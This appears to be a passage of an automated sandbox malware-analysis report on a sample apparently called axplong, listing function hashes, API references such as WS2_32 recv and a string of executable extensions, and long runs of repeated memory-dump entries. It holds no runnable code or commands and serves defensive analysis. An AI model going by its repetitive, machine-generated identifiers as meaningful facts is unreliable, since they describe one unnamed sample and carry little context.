                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _wcsrchr
                                                                                                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                                    • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                                    • Opcode ID: ad22b2e622905d93dd84daac2256469a0facae74a70c037784aae97610159da1
                                                                                                                                                                                                                                                    • Instruction ID: 320f8129838bff35816d1a6fab9933c0d7ea5bf6a7aad7ec1709049c5c12d995
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad22b2e622905d93dd84daac2256469a0facae74a70c037784aae97610159da1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201D6376087162666187459AC12ABF17DFAB87BB472E002FFD44F73C2EE45DC4289A4
                                                                                                                                                                                                                                                    Function 00672AF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672B23
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: 7oq<$P#g$P#g$This function cannot be called on a default constructed task
                                                                                                                                                                                                                                                    • API String ID: 2659868963-3138433626
                                                                                                                                                                                                                                                    • Opcode ID: a1f6b6683aa074f9edcfb53002684b324035194a9ef7a0b4c7359d144c79a2fb
                                                                                                                                                                                                                                                    • Instruction ID: 5e74860bde90610b2c0a0697feead42fc9faa1c95deff9fba99442193fe773f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1f6b6683aa074f9edcfb53002684b324035194a9ef7a0b4c7359d144c79a2fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0A770D1020C9FC710DF689841AAEFBFADF16300F5042AEF84067301EB715A548BA9
                                                                                                                                                                                                                                                    Function 006B4AD4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea
                                                                                                                                                                                                                                                    • String ID: 7oq<
                                                                                                                                                                                                                                                    • API String ID: 240046367-377005865
                                                                                                                                                                                                                                                    • Opcode ID: 810102381a1a9f9aa08154eba6cb8d156c99ef73fd19e9221ddefe9c0b3fbc2a
                                                                                                                                                                                                                                                    • Instruction ID: fc2799025950d1ff3a19613adb93c068be210e8bf2d468fdf9b673cc8875d9b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810102381a1a9f9aa08154eba6cb8d156c99ef73fd19e9221ddefe9c0b3fbc2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F51EEB2501216AFEB25AFA4CC41EFB3BABDF45B54F154129FD0497242EB31DC818BA4
                                                                                                                                                                                                                                                    Function 00687870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0068795C
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00687968
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00687971
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @yh
                                                                                                                                                                                                                                                    • API String ID: 4078500453-844070663
                                                                                                                                                                                                                                                    • Opcode ID: 5a42853230adea0a06be1bcfe6a8bc6a26b53d5db9ee1a3e28589a8739dca545
                                                                                                                                                                                                                                                    • Instruction ID: 3cf3d7ed92ac86c2dc710608310941e613d7f7fe6489d2cf5f0d6f6cd9ba240b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a42853230adea0a06be1bcfe6a8bc6a26b53d5db9ee1a3e28589a8739dca545
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB31D2B29047049FDB20EF68D845A6AB7E9EF19310F200B3EF949C7341E771EA5487A5
                                                                                                                                                                                                                                                    Function 0067DFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • recv.WS2_32(?,?,00000004,00000000), ref: 0067E01B
                                                                                                                                                                                                                                                    • recv.WS2_32(?,?,00000008,00000000), ref: 0067E050
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
